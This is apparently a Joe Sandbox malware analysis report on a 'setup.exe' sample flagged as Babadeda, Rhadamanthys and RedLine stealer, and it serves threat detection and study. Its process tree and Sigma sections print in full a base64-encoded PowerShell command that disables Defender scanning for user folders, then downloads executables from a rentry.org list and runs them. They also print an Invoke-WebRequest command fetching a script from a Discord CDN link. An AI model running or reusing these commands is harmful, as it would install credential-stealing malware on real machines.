Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
setup.exe

Overview

General Information

Sample name:setup.exe
Analysis ID:1468866
MD5:b5e479d3926b22b59926050c29c4e761
SHA1:a456cc6993d12abe6c44f2d453d7ae5da2029e24
SHA256:fbc4058b92d9bc4dda2dbc64cc61d0b3f193415aad15c362a5d87c90ca1be30b
Tags:exe
Infos:

Detection

Babadeda, RHADAMANTHYS, RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Babadeda
Yara detected Powershell download and execute
Yara detected RHADAMANTHYS Stealer
Yara detected RedLine Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops large PE files
Encrypted powershell cmdline option found
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Potential dropper URLs found in powershell memory
Powershell drops PE file
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes or reads registry keys via WMI
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries keyboard layouts
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic

Classification

  • System is w10x64
  • setup.exe (PID: 7488 cmdline: "C:\Users\user\Desktop\setup.exe" MD5: B5E479D3926B22B59926050C29C4E761)
    • powershell.exe (PID: 7548 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • okdtlfsk.k4u0.exe (PID: 4956 cmdline: "C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exe" MD5: CEE45150AF795124C072DDF8AB9EEE0E)
        • conhost.exe (PID: 5312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • okdtlfsk.k4u1.exe (PID: 3168 cmdline: "C:\Users\user\AppData\Roaming\okdtlfsk.k4u1.exe" MD5: 448E72D5B4A0AB039607CBAF93707732)
        • OpenWith.exe (PID: 7972 cmdline: "C:\Windows\system32\openwith.exe" MD5: 0ED31792A7FFF811883F80047CBCFC91)
      • okdtlfsk.k4u2.exe (PID: 5844 cmdline: "C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exe" MD5: A3B2FCF0C05BB385115894D38C2E6C44)
        • cmd.exe (PID: 7496 cmdline: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\2030.tmp\2031.tmp\2032.bat C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • where.exe (PID: 1196 cmdline: where node MD5: 3CF958B0F63FB1D74F7FCFE14B039A58)
          • powershell.exe (PID: 4588 cmdline: powershell -Command "Invoke-WebRequest -Uri 'https://nodejs.org/dist/v20.12.2/node-v20.12.2-x64.msi' -OutFile 'nodejs-installer.msi'" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • msiexec.exe (PID: 732 cmdline: msiexec /i nodejs-installer.msi /quiet MD5: E5DA170027542E25EDE42FC54C929077)
          • powershell.exe (PID: 7012 cmdline: powershell -Command "Invoke-WebRequest -Uri 'https://cdn.discordapp.com/attachments/1249192949389201463/1249192988895350794/index.js?ex=666da961&is=666c57e1&hm=18936ed8d9532b88193b485814d4fae2181305431d8e870870aab77fc153e162&' -OutFile 'C:\Users\user\AppData\Local\Temp\chrome2\index.js'" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • okdtlfsk.k4u3.exe (PID: 6300 cmdline: "C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exe" MD5: 8578F7C0977818E0A940AB0B9F227B33)
        • Steam.exe (PID: 5144 cmdline: "C:\Users\user\AppData\Local\Programs\Steam\Steam.exe" MD5: F040B4DE6F293D0B5B801A8E24CCA145)
          • cscript.exe (PID: 4336 cmdline: cscript.exe MD5: 24590BF74BBBBFD7D7AC070F4E3C44FD)
            • conhost.exe (PID: 2704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • Steam.exe (PID: 8108 cmdline: "C:\Users\user\AppData\Local\Programs\Steam\Steam.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\Steam" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1696,i,16557963471468826308,12020294816136511924,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1684 /prefetch:2 MD5: F040B4DE6F293D0B5B801A8E24CCA145)
          • cscript.exe (PID: 7908 cmdline: cscript.exe //Nologo C:\Users\user\AppData\Local\Programs\Steam\resources\app.asar.unpacked\node_modules\regedit\vbs\regList.wsf A HKCU\Software\Valve\Steam MD5: 24590BF74BBBBFD7D7AC070F4E3C44FD)
            • conhost.exe (PID: 4116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • Steam.exe (PID: 2344 cmdline: "C:\Users\user\AppData\Local\Programs\Steam\Steam.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\Steam" --field-trial-handle=2456,i,16557963471468826308,12020294816136511924,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2356 /prefetch:3 MD5: F040B4DE6F293D0B5B801A8E24CCA145)
  • svchost.exe (PID: 5924 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • msiexec.exe (PID: 3588 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 2852 cmdline: C:\Windows\System32\MsiExec.exe -Embedding 933007F3F47C18EFDBF07080B43D7822 MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 7804 cmdline: C:\Windows\System32\MsiExec.exe -Embedding E900A4471D84F90E9185A9C7E4B35274 E Global\MSI0000 MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 6724 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 3B1C8062EAD881799860A5FD745359D4 MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
BabadedaAccording to PCrisk, Babadeda is a new sample in the crypters family, allowing threat actors to encrypt and obfuscate the malicious samples. The obfuscation allows malware to bypass the majority of antivirus protections without triggering any alerts. According to the researchers analysis, Babadeda leverages a sophisticated and complex obfuscation that shows a very low detection rate by anti-virus engines.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.babadeda
NameDescriptionAttributionBlogpost URLsLink
RhadamanthysAccording to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
  • Sandworm
https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
No configs have been found
SourceRuleDescriptionAuthorStrings
00000007.00000002.2333234648.0000000002A51000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    00000009.00000003.2333599163.00000000009E0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
      00000011.00000003.2358387982.0000000004E40000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
        00000011.00000003.2359890037.0000000005060000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
          00000009.00000003.2346868214.00000000034D0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
            Click to see the 8 entries
            SourceRuleDescriptionAuthorStrings
            10.0.okdtlfsk.k4u2.exe.400000.0.unpackJoeSecurity_BabadedaYara detected BabadedaJoe Security
              9.3.okdtlfsk.k4u1.exe.4040000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                9.3.okdtlfsk.k4u1.exe.3e20000.6.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                  9.3.okdtlfsk.k4u1.exe.3e20000.0.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                    17.3.OpenWith.exe.5060000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                      Click to see the 2 entries
                      SourceRuleDescriptionAuthorStrings
                      amsi64_7548.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                        System Summary

                        barindex
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFA
                        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri 'https://cdn.discordapp.com/attachments/1249192949389201463/1249192988895350794/index.js?ex=666da961&is=666c57e1&hm=18936ed8d9532b88193b485814d4fae2181305431d8e870870aab77fc153e162&' -OutFile 'C:\Users\user\AppData\Local\Temp\chrome2\index.js'", CommandLine: powershell -Command "Invoke-WebRequest -Uri 'https://cdn.discordapp.com/attachments/1249192949389201463/1249192988895350794/index.js?ex=666da961&is=666c57e1&hm=18936ed8d9532b88193b485814d4fae2181305431d8e870870aab77fc153e162&' -OutFile 'C:\Users\user\AppData\Local\Temp\chrome2\index.js'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\2030.tmp\2031.tmp\2032.bat C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7496, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri 'https://cdn.discordapp.com/attachments/1249192949389201463/1249192988895350794/index.js?ex=666da961&is=666c57e1&hm=18936ed8d9532b88193b485814d4fae2181305431d8e870870aab77fc153e162&' -OutFile 'C:\Users\user\AppData\Local\Temp\chrome2\index.js'", ProcessId: 7012, ProcessName: powershell.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -Command "Invoke-WebRequest -Uri 'https://cdn.discordapp.com/attachments/1249192949389201463/1249192988895350794/index.js?ex=666da961&is=666c57e1&hm=18936ed8d9532b88193b485814d4fae2181305431d8e870870aab77fc153e162&' -OutFile 'C:\Users\user\AppData\Local\Temp\chrome2\index.js'", CommandLine: powershell -Command "Invoke-WebRequest -Uri 'https://cdn.discordapp.com/attachments/1249192949389201463/1249192988895350794/index.js?ex=666da961&is=666c57e1&hm=18936ed8d9532b88193b485814d4fae2181305431d8e870870aab77fc153e162&' -OutFile 'C:\Users\user\AppData\Local\Temp\chrome2\index.js'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\2030.tmp\2031.tmp\2032.bat C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7496, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri 'https://cdn.discordapp.com/attachments/1249192949389201463/1249192988895350794/index.js?ex=666da961&is=666c57e1&hm=18936ed8d9532b88193b485814d4fae2181305431d8e870870aab77fc153e162&' -OutFile 'C:\Users\user\AppData\Local\Temp\chrome2\index.js'", ProcessId: 7012, ProcessName: powershell.exe
                        Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7548, TargetFilename: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri 'https://nodejs.org/dist/v20.12.2/node-v20.12.2-x64.msi' -OutFile 'nodejs-installer.msi'", CommandLine: powershell -Command "Invoke-WebRequest -Uri 'https://nodejs.org/dist/v20.12.2/node-v20.12.2-x64.msi' -OutFile 'nodejs-installer.msi'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\2030.tmp\2031.tmp\2032.bat C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7496, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri 'https://nodejs.org/dist/v20.12.2/node-v20.12.2-x64.msi' -OutFile 'nodejs-installer.msi'", ProcessId: 4588, ProcessName: powershell.exe
                        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand 